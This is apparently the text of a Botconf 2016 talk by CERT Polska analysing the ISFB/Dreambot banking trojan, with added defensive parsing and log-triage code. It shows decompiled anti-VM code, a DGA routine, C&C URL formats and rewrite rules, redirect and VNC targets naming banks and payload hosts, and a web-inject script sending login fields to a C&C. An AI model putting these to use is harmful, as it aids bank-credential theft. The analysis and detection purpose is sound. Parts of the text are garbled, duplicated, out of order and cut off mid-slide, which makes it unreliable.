DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 15: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

[29/58] Web Actions

  ACTION: REDIRECT - Target: myjs128js -> http51016736dimyjs128_plv3js
  ACTION: REDIRECT - Target: myjs28js -> http51016736dimyjs28_plv3js
  ACTION: REDIRECT - Target: ats8gatephp -> http51016736azatsbmidgate128php
  ACTION: REDIRECT - Target: httpswwwcentrum24pl -> http51016736fkcen1php
  ACTION: REDIRECT - Target: httpscompanynetmbankpl -> http51016736fkmbiz1php
  ACTION: FILE - Target: prv
  ACTION: VNC - Target: httpswwwpekaobiznes24 | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin
  ACTION: VNC - Target: httpscompanynetmbankpl | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin
  ACTION: VNC - Target: httpsiri | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin
  ACTION: VNC - Target: httpskiri | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin
  ACTION: VNC - Target: httpsibiznes2 | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin
  ACTION: VNC - Target: httpsplhomebankin | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin
  ACTION: VNC - Target: httpshbfaces | source: httpthesellingoutletcomp32bin, httpthesellingoutletcomp64bin

[30/58] The Bot

Registry Keys

[31/58] Registry Keys

  Software\AppDataLow\Software\Microsoft\{[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}}

  · Install
  · Client
  · NetCfg
  · LastTask
  · LastConfig

[32/58] Other Actions

  · GET_CERTS
  · GET_COOKIES
  · GET_SYSINFO
  · LOAD_EXE
  · GET_FILES
  · SOCKS_START
  · GET_KEYLOG
  · GET_MAIL
  · GET_FTP
  · VNC_START
  · URL_BLOCK

[33/58] Calling Home

[34/58] ET phone home

  · Static domains inside configuration files
  · DGA based on a template and the current date
  · C&C hidden in the TOR network
  · P2P network

[35/58] DGA

  # LsaRandom (the bot's PRNG), words and kwargs are defined outside this excerpt
  rnd = LsaRandom()
  rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
  # rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
  r = []
  for i in range(kwargs['count']):
      suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]  # rnd.choose(kwargs['tld'])
      dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
      wc = 0
      dom = []
      while wc < dom_l:
          d = rnd.choose(words)
          ws = len(d)
          if not rnd.rnd() % 3:
              ws //= 2          # every third word (on average) is cut in half
          if wc + ws > self.DGA_MAX_LEN:
              continue
          dom.append(d[:ws])
          wc += ws
      r.append(''.join(dom) + suf)

  PYTHON

TOR

[36/58] TOR

[37/58] P2P

  typedef struct {
      DWORD magic;        // 0x395f2ec1
      DWORD my_secret;
      DWORD his_secret;
      BYTE  cmd0;
      BYTE  cmd1;
      BYTE  data[];
  } isfb_p2p_inner_packet;

  typedef struct {
      BYTE  flags;
      DWORD salt;                  // 4 random higher bytes of keys
      isfb_p2p_inner_packet p;     // encrypted
  } isfb_p2p_packet;

  C

[38/58] Internet is Hard

[39/58] URL format

  http://%s/%s?user%5fid=%.4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

  tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY
  oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

  cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul/jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

  /t[RAND]?[RAND]=data

[40/58] URL format

  # Python 2; decrypt() is Serpent with the static key SKEY taken from the sample
  import re
  import pprint

  decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
  # undo the bot's URL-safe escaping: _XX -> chr(0xXX) (e.g. _2B -> '+', _2F -> '/')
  d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
  try:
      e = d.decode('base64')
  except Exception as e:
      d = d + '=='              # the bot strips base64 padding; put it back
  pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

  PYTHON

  {'crc': '7001380',
   'id': '1065',
   'ppc': 'xi',
   'server': '12',
   'soft': '1',
   'user': '0c0d784a0cf755970edbdf4c0cb27fca',
   'version': '214887'}

URL format

[41/58] URL format

  path            purpose                  note
  t.php           get new task             used until Sep 2015
  c.php           get new config           used until Sep 2015
  d.php           send stolen data         used until Sep 2015
  images/*.gif    get new task             current format
  images/*.jpeg   get new config           current format
  images/*.bmp    send stolen data         current format
  images/*.avi    download 2nd stage dll   not every C&C
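The three slides above give enough to write network-side triage logic: the request path alone tells you which kind of C&C exchange a beacon is (task, config, stolen data, loader), and the path payload can be un-escaped and base64-decoded before any decryption. The following is an added example written for this page, not code from the talk or from the author's tooling. The path patterns come from the URL-format table and the C&C rewrite rules shown later; the log line format, host names and payloads are constructed. Dropping '/' inside the payload before decoding is an assumption, and the decoded blob is still Serpent-encrypted, so no key is involved.

```python
"""Triage proxy log lines for ISFB-style C&C request paths (added example)."""
import base64
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Legacy layout (until Sep 2015): t.php / c.php / d.php. The Dreambot rewrite
# rules accept ^[tcd](.+)\.php$, so any name starting with that letter qualifies;
# on its own this pattern is loose and needs corroboration (host, periodicity).
LEGACY = re.compile(r"^/(?P<kind>[tcd])[^/]*\.php$", re.IGNORECASE)
# Current layout: /images/<payload>.<ext>, the purpose is encoded in the extension.
IMAGES = re.compile(r"^/images/(?P<payload>.+)\.(?P<ext>gif|jpeg|bmp|avi)$", re.IGNORECASE)

PURPOSE = {
    "t": "get new task", "c": "get new config", "d": "send stolen data",
    "gif": "get new task", "jpeg": "get new config",
    "bmp": "send stolen data", "avi": "download 2nd stage dll",
}


def classify_path(path: str) -> Optional[str]:
    """Map a request path to the purpose from the table, or None if neither layout matches."""
    m = LEGACY.match(path)
    if m:
        return PURPOSE[m.group("kind").lower()]
    m = IMAGES.match(path)
    if m:
        return PURPOSE[m.group("ext").lower()]
    return None


def unescape_payload(payload: str) -> bytes:
    """Reverse the bot's URL-safe encoding the way the slide's decoder does:
    _XX -> byte, then repair the stripped base64 padding.
    ASSUMPTION: '/' inside the payload only splits path segments and is dropped.
    The returned bytes are still ciphertext."""
    s = payload.replace("/", "")
    s = re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s)


# Constructed log lines: "<timestamp> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2016-11-30T10:01:02Z 10.0.0.5 GET http://cnc.invalid/images/QUJDRA_2B_2F/RUZHSA.jpeg 200
2016-11-30T10:01:09Z 10.0.0.5 GET http://cnc.invalid/t1a2b.php?x=1 200
2016-11-30T10:02:00Z 10.0.0.7 GET http://cdn.example/images/logo.png 200
2016-11-30T10:03:00Z 10.0.0.5 POST http://cnc.invalid/images/AAAA.bmp 200
"""
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d+)$")


def triage_log(text: str) -> List[dict]:
    """Return one record per line whose path matches one of the C&C layouts."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        purpose = classify_path(parts.path)
        if purpose is None:
            continue
        rec = {"src": m.group("src"), "host": parts.hostname, "path": parts.path, "purpose": purpose}
        im = IMAGES.match(parts.path)
        if im:
            rec["blob"] = unescape_payload(im.group("payload"))
        hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in triage_log(SAMPLE_LOG):
        print(rec["src"], rec["host"], rec["path"], "->", rec["purpose"])
```

The `images/*.<ext>` convention is the stronger signal; the legacy `[tcd]*.php` pattern matches many benign paths and should only raise a score when it co-occurs with the same host and a regular beacon interval.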

[42/58] C&C response

[43/58] C&C response

[44/58] Wiki

  Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

  Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

[45/58] C&C response

[46/58] Command and Control

[47/58] IAP

  rewrite ^/fileto/(.*)\.(bin)   /get128.php?x=$1     break;
  rewrite ^/images/(.*)\.(bmp)   /data.php?x=$1.$2    break;
  rewrite ^/images/(.*)\.(avi)   /loader.php?x=$1.$2  break;
  rewrite ^/images/(.*)\.(gif)   /task.php?x=$1.$2    break;
  rewrite ^/images/(.*)\.(jpeg)  /config.php?x=$1.$2  break;

[48/58] IAP

[49/58] IAP

[50/58] Dreambot

  RewriteEngine on
  RewriteRule ^c(.+)\.php$          new_chandler.php            [L,QSA]
  RewriteRule ^t(.+)\.php$          new_thandler.php            [L,QSA]
  RewriteRule ^d(.+)\.php$          new_dhandler.php            [L,QSA]
  RewriteRule ^images/(.*)\.(bmp)   new_dhandler.php?q=$1.$2    [L,QSA]
  RewriteRule ^images/(.*)\.(gif)   new_thandler.php?q=$1.$2    [L,QSA]
  RewriteRule ^images/(.*)\.(jpeg)  new_chandler.php?q=$1.$2    [L,QSA]

Dreambot

[51/58] Dreambot

[52/58] Dreambot

[53/58] Dreambot

  rule isfb_dreambot : banker
  {
      meta:
          author = "mak"
          module = "isfb"
      strings:
          $str0 = "vmware" fullword
          $str1 = "vbox" fullword
          $str2 = "virtual hd" fullword
          $str4 = "qemu" fullword
          $str3 = "c321.txt" fullword
      condition:
          all of them and isfb_dropper
  }

[54/58] The End, or not

[55/58] Offspring and Cousins

Common Roots / Payloads

  · Nymaim
  · Powersniff / PunchyBagg

  · Bolek/KBOT - based on Gozi
  · Rovnix - ISFB was the ring3 payload protected by Rovnix
  · Vawtrak - nothing in common

Recap

[56/58] Recap

  · One of the oldest bankers under active development
  · Interesting solutions
  · Various methods of infection
  · Elaborate communication methods: DGA, P2P, TOR
  · Old bugs die hard
  · Read the paper for more details
  · Code soon available at mak's GitHub: random-stuff/isfb

[57/58] Kudos: people that knowingly (or not) helped us

  · Slavo
  · Paul Black
  · Kafeine
  · Peter Kruse
  · Piotr Kijewski
  · Jarosław Jedynak
  · Horgh
  · Frank Ruiz

[58/58] Q & A

  info@cert.pl  www.cert.pl
  CERTPolska  CERTPolska
  CERTPolska  CERTPolska_en
  mak  mak@cert.pl


[16/58] Anti-VM

  // decompiler output; 0xC is SPDRP_FRIENDLYNAME, so the friendly names of
  // enumerated devices are searched for hypervisor vendor strings
  DeviceInfoData.cbSize = 28;
  if ( SetupDiEnumDeviceInfo(v1, 0, &DeviceInfoData) )
  {
    SetupDiGetDeviceRegistryPropertyA(v1, &DeviceInfoData, 0xCu, &Property, 0, 0, &PropertyBufferSize);
    if ( PropertyBufferSize )
    {
      v2 = (BYTE *)xHeapAlloc(PropertyBufferSize);
      v3 = (CHAR *)v2;
      if ( v2 )
      {
        if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSet, &DeviceInfoData, 0xCu, &Property, v2, PropertyBufferSize, &PropertyBufferSize)
          && (StrStrIA(v3, "vbox") || StrStrIA(v3, "qemu") || StrStrIA(v3, "vmware") || StrStrIA(v3, "virtual hd")) )
        {
          v0 = 1;
        }
        xHeapFree(v3);
      }
    }
  }

  C

[17/58] String encryption

  // decompiler output; the XOR key is derived from the build date string
  // ("Oct 29 2016") and the .bss section's RVA and size
  signed int __stdcall decode_bss(int shift)
  {
    // v2 points to the VA of .bss
    if ( !v2 )
      return 2;
    v6 = v2->VirtualAddress;
    if ( !v6 || !v2->SizeOfRawData )
      return 192;
    v7 = v2->SizeOfRawData;
    v8 = *(_DWORD *)"016";
    v9 = v13;
    v10 = (shift & 0x1F) + (*(_DWORD *)"29 2016" ^ *(_DWORD *)"Oct 29 2016" ^ (v7 + v6));
    XorDecryptBuffer(v7, (int *)((char *)v13 + v6), v2->SizeOfRawData, v10);
    dword_4064EC = dword_40766E + dword_407662 + dword_407666;
    if ( dword_40766E + dword_407662 + dword_407666 != 0xEE553B4E )   // check if correctly decoded
    {
      XorEncryptBuffer(dword_407662, (IMAGE_DOS_HEADER *)((char *)v9 + v2->VirtualAddress), v2->SizeOfRawData);
      v14 = 12;
    }

  C

[18/58] Joined resources, or FJ-structs

  typedef struct {
      DWORD fj_magic;
      DWORD addr;
      DWORD size;
      DWORD crc32_name;
      DWORD flags;        // OR-ed with 0x10000 means it is packed with aPLib
  } isfb_fj_elem;

  C

[19/58] Joined resources, or J1-structs

  typedef struct {
      DWORD j1_magic;
      DWORD flags;        // can be aPLib packed
      DWORD crc32_name;
      DWORD addr;
      DWORD size;
  } isfb_fj_elem;

  C

  - 0x4F75CEA7, 0x9e154a0c              CRC_CLIENT32
  - 0xD722AFCB, 0x8365B957, 0x8fb1dde1  CRC_CLIENT_INI
  - 0xE1285E64                          CRC_PUBLIC_KEY
  - 0x90F8AAB4, 0x41982e1f              CRC_CLIENT64
  - 0x7A042A8A                          NEW - UNKNOWN
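The two struct layouts above differ only in field order, so one table walker can serve both when the layout is a parameter. The following is an added example for this page, not code from the talk or its author; it resolves crc32_name against the list on the slide and flags aPLib-packed entries without unpacking them (aPLib decompression is out of scope here). The magic values and the payload bytes are constructed placeholders, and treating addr as an offset from the start of the blob is an assumption for the sample.

```python
"""Walk an ISFB FJ/J1 joined-resource table (added example, constructed sample)."""
import struct
from typing import Dict, List

# Names for the crc32_name values listed on slide 19.
KNOWN_NAMES: Dict[int, str] = {
    0x4F75CEA7: "CRC_CLIENT32", 0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI", 0x8FB1DDE1: "CRC_CLIENT_INI",
    0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64", 0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW - UNKNOWN",
}
APLIB_FLAG = 0x10000                      # slide 18: flags OR 0x10000 -> aPLib packed
ELEM = struct.Struct("<IIIII")            # five DWORDs, little-endian, 20 bytes
LAYOUTS = {                               # field order per variant, first field is the magic
    "FJ": ("fj_magic", "addr", "size", "crc32_name", "flags"),
    "J1": ("j1_magic", "flags", "crc32_name", "addr", "size"),
}
SAMPLE_MAGIC = 0x3131304A                 # constructed placeholder, not the bot's real magic


def parse_joined_resources(blob: bytes, table_off: int, magic: int, variant: str = "J1") -> List[dict]:
    """Read consecutive elements from table_off until the magic no longer matches.
    ASSUMPTION: addr is an offset from the start of blob."""
    names = LAYOUTS[variant]
    out = []
    off = table_off
    while off + ELEM.size <= len(blob):
        rec = dict(zip(names, ELEM.unpack_from(blob, off)))
        if rec[names[0]] != magic:
            break
        if rec["addr"] + rec["size"] > len(blob):
            raise ValueError("element at 0x%x points outside the blob" % off)
        rec["name"] = KNOWN_NAMES.get(rec["crc32_name"], "UNKNOWN(0x%08x)" % rec["crc32_name"])
        rec["aplib_packed"] = bool(rec["flags"] & APLIB_FLAG)
        rec["data"] = blob[rec["addr"]:rec["addr"] + rec["size"]]
        out.append(rec)
        off += ELEM.size
    return out


def build_sample(variant: str = "J1") -> bytes:
    """Constructed blob: a table of three elements, a zero terminator, then the payloads."""
    payloads = [
        (0x4F75CEA7, 0, b"MZ\x90\x00fake-client32"),
        (0xD722AFCB, APLIB_FLAG, b"\x00compressed-ini-bytes"),
        (0xE1285E64, 0, b"-----BEGIN FAKE KEY-----"),
    ]
    names = LAYOUTS[variant]
    table_len = ELEM.size * len(payloads) + 4
    table, data = b"", b""
    for crc, flags, body in payloads:
        fields = {names[0]: SAMPLE_MAGIC, "flags": flags, "crc32_name": crc,
                  "addr": table_len + len(data), "size": len(body)}
        table += ELEM.pack(*(fields[n] for n in names))
        data += body
    return table + b"\x00\x00\x00\x00" + data


if __name__ == "__main__":
    for variant in ("FJ", "J1"):
        for e in parse_joined_resources(build_sample(variant), 0, SAMPLE_MAGIC, variant):
            print(variant, e["name"], "packed" if e["aplib_packed"] else "raw", len(e["data"]), "bytes")
```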

[20/58] Static configuration

  typedef struct {
      DWORD off;
      DWORD flags;
      QWORD value;
      QWORD uid;
  } isfb_cfg_elem;

  typedef struct {
      QWORD count;
      isfb_cfg_elem elems[count];
      char string_table[];
  };

  C

Static cfg - fields

[21/58] Static cfg - fields

  · 0x556aed8f - server
  · 0xea9ea760 - bootstrap
  · 0x656b798a - botnet
  · 0x4fa8693e - key
  · 0xd0665bf6, 0x75e6145c - domains
  · 0xefc574ae - dga_seed
  · 0x73177345 - dga_base_url
  · 0xec99df2e - dga_tld
  · 0xdf351e24 - tor32_dll
  · 0x510f22d2 - tor_domains
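Extracting the static configuration from a sample means walking the element array above and resolving each uid to one of the field names on this slide. The following is an added example written for this page, not the author's extractor; it follows the layout exactly as given (QWORD count, 24-byte elements, trailing string table). How flags distinguishes a string-table offset from an inline integer is not stated on the slide, so bit 0 meaning "value is an offset into string_table" is an assumption made for the constructed sample, as is leaving off untouched.

```python
"""Parse an ISFB static configuration blob (added example, constructed sample)."""
import struct
from typing import Dict, Union

CFG_FIELD_NAMES: Dict[int, str] = {          # uid -> name, from slide 21
    0x556AED8F: "server", 0xEA9EA760: "bootstrap", 0x656B798A: "botnet",
    0x4FA8693E: "key", 0xD0665BF6: "domains", 0x75E6145C: "domains",
    0xEFC574AE: "dga_seed", 0x73177345: "dga_base_url", 0xEC99DF2E: "dga_tld",
    0xDF351E24: "tor32_dll", 0x510F22D2: "tor_domains",
}
CFG_HDR = struct.Struct("<Q")                # QWORD count
CFG_ELEM = struct.Struct("<IIQQ")            # off, flags, value, uid (24 bytes)
FLAG_STRING = 0x1                            # ASSUMPTION: value is an offset into string_table


def parse_static_config(blob: bytes) -> Dict[str, Union[int, str]]:
    """Return {field_name: value} with strings resolved from the string table."""
    (count,) = CFG_HDR.unpack_from(blob, 0)
    table_off = CFG_HDR.size + count * CFG_ELEM.size
    if table_off > len(blob):
        raise ValueError("count=%d exceeds blob size" % count)
    strings = blob[table_off:]
    out: Dict[str, Union[int, str]] = {}
    for i in range(count):
        off, flags, value, uid = CFG_ELEM.unpack_from(blob, CFG_HDR.size + i * CFG_ELEM.size)
        name = CFG_FIELD_NAMES.get(uid, "unknown_0x%08x" % uid)
        if flags & FLAG_STRING:
            if value >= len(strings):
                raise ValueError("string offset %d for %s outside string table" % (value, name))
            end = strings.find(b"\x00", value)
            raw = strings[value:end if end != -1 else len(strings)]
            out[name] = raw.decode("latin-1")
        else:
            out[name] = value
    return out


def is_well_formed_config(blob: bytes) -> bool:
    try:
        parse_static_config(blob)
        return True
    except (ValueError, struct.error):
        return False


def build_sample_config() -> bytes:
    """Constructed blob, not taken from a real sample."""
    fields = [
        (0x556AED8F, "cnc.example.invalid"),
        (0x656B798A, 1065),
        (0xEFC574AE, 0x12345678),
        (0xEC99DF2E, ".example"),
        (0x510F22D2, "abcdefghijklmnop.onion"),
    ]
    elems, table = b"", b""
    for uid, val in fields:
        if isinstance(val, str):
            elems += CFG_ELEM.pack(0, FLAG_STRING, len(table), uid)
            table += val.encode("latin-1") + b"\x00"
        else:
            elems += CFG_ELEM.pack(0, 0, val, uid)
    return CFG_HDR.pack(len(fields)) + elems + table


if __name__ == "__main__":
    for k, v in parse_static_config(build_sample_config()).items():
        print("%-14s %r" % (k, v))
```

The bounds checks matter in practice: a wrong flags interpretation or a corrupted count should fail loudly rather than yield plausible-looking garbage that ends up in a blocklist.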

[22/58] Static cfg

[23/58] Static cfg

[24/58] Static cfg

[25/58] Man in the Browser, or where my money goes

Dynamic config

[26/58] Dynamic config

  typedef struct {
      DWORD size;
      BYTE  data[size];
  } inject_elem;

  typedef struct {
      inject_elem target;      // url glob
      inject_elem action;      // or regex
      inject_elem params[4];   // other params
  } inject_chunk;

  typedef inject_chunk injects_t[];

  C
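A dynamic config is therefore a flat run of length-prefixed elements that groups into chunks of six (target glob, action, four parameters). An analyst who has decrypted one wants to know which of the organisation's URLs are targeted and by which action. The following is an added example for this page, not the author's code; the element encoding follows the struct above, the glob is matched with Python's fnmatch translation (an assumption about the bot's glob dialect), and the targets, actions and parameters in the sample are constructed (the action names come from the Web Actions slide).

```python
"""Parse an ISFB inject config and match target globs against URLs (added example)."""
import fnmatch
import re
import struct
from typing import List

ELEM_LEN = struct.Struct("<I")      # DWORD size, followed by size bytes of data
CHUNK_ELEMS = 6                     # target, action, params[4]


def parse_injects(blob: bytes) -> List[dict]:
    """Split the blob into elements, then group them into chunks; raise on truncation."""
    elems, off = [], 0
    while off < len(blob):
        if off + ELEM_LEN.size > len(blob):
            raise ValueError("truncated length field at offset %d" % off)
        (size,) = ELEM_LEN.unpack_from(blob, off)
        off += ELEM_LEN.size
        if off + size > len(blob):
            raise ValueError("element at offset %d runs past end of blob" % (off - ELEM_LEN.size))
        elems.append(blob[off:off + size])
        off += size
    if len(elems) % CHUNK_ELEMS:
        raise ValueError("%d elements is not a multiple of %d" % (len(elems), CHUNK_ELEMS))
    chunks = []
    for i in range(0, len(elems), CHUNK_ELEMS):
        target, action, *params = elems[i:i + CHUNK_ELEMS]
        chunks.append({"target": target.decode("latin-1"),
                       "action": action.decode("latin-1"),
                       "params": [p.decode("latin-1") for p in params]})
    return chunks


def is_well_formed_injects(blob: bytes) -> bool:
    try:
        parse_injects(blob)
        return True
    except ValueError:
        return False


def targeted_chunks(chunks: List[dict], url: str) -> List[dict]:
    """Chunks whose target glob matches url (case-insensitive; '*' and '?' wildcards)."""
    hits = []
    for c in chunks:
        pattern = re.compile(fnmatch.translate(c["target"]), re.IGNORECASE)
        if pattern.match(url):
            hits.append(c)
    return hits


def pack_inject(target: str, action: str, params: List[str]) -> bytes:
    """Constructed encoder, used only to build the sample below."""
    assert len(params) == 4
    out = b""
    for s in [target, action] + params:
        raw = s.encode("latin-1")
        out += ELEM_LEN.pack(len(raw)) + raw
    return out


SAMPLE_INJECTS = (
    pack_inject("https://online.bank-a.example/*", "NEWGRAB", ['<div id="login">', "</form>", "", ""])
    + pack_inject("*bank-b.example/transfer*", "SCREENSHOT", ["", "", "", ""])
    + pack_inject("https://*.bank-a.example/api/*", "POST", ["", "", "", ""])
)

if __name__ == "__main__":
    chunks = parse_injects(SAMPLE_INJECTS)
    for url in ("https://online.bank-a.example/api/x", "https://mail.example/"):
        print(url, [c["action"] for c in targeted_chunks(chunks, url)])
```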

[27/58] Web Injects

  var bn = "US_" + "BOFA_1";
  var bot_id = "ID_" + bn;
  var sa = decode64();
